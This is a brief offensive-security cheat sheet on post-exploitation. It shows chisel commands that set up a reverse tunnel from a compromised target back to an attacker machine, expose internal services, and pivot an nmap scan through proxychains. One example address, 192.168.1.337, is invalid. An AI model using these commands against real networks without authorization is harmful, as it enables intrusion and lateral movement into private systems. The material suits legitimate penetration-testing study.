About Post Exploitation

Post-exploitation refers to the phase of a cybersecurity attack that occurs after an attacker has successfully compromised a target system. During this phase, the attacker aims to maintain access, gather valuable information, escalate privileges, and potentially launch further attacks. It involves activities such as lateral movement within the network, data exfiltration, creating backdoors, and covering their tracks to avoid detection. Post-exploitation is a crucial part of the attack lifecycle as it allows the attacker to maximize the impact of their initial compromise and achieve their ultimate objectives.

Tunneling with Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

Exposing Internal Service

• https://github.com/jpillora/chisel

On attacker machine, run this command:

chisel server -p 2525 --socks5 --reverse -v

Example, on target there is service running on port 8000 at localhost, then run this command:

./chisel client 10.10.14.46:2525 R:8001:127.0.0.1:8000

Now, we can access the service from port 8001 on our machine.

Scanning Internal Server / IP

From attacker machine, run chisel server.

./chisel server -p 31337 --socks5 --reverse -v

From Client:

./chisel client 10.10.200.13:31337 R:31338:socks

Now, from attacker machine, add proxy to proxychains4.conf

socks5 127.0.0.1 31338

Now you can scan internal target IP from attacker machine.

proxychains4 nmap 192.168.1.337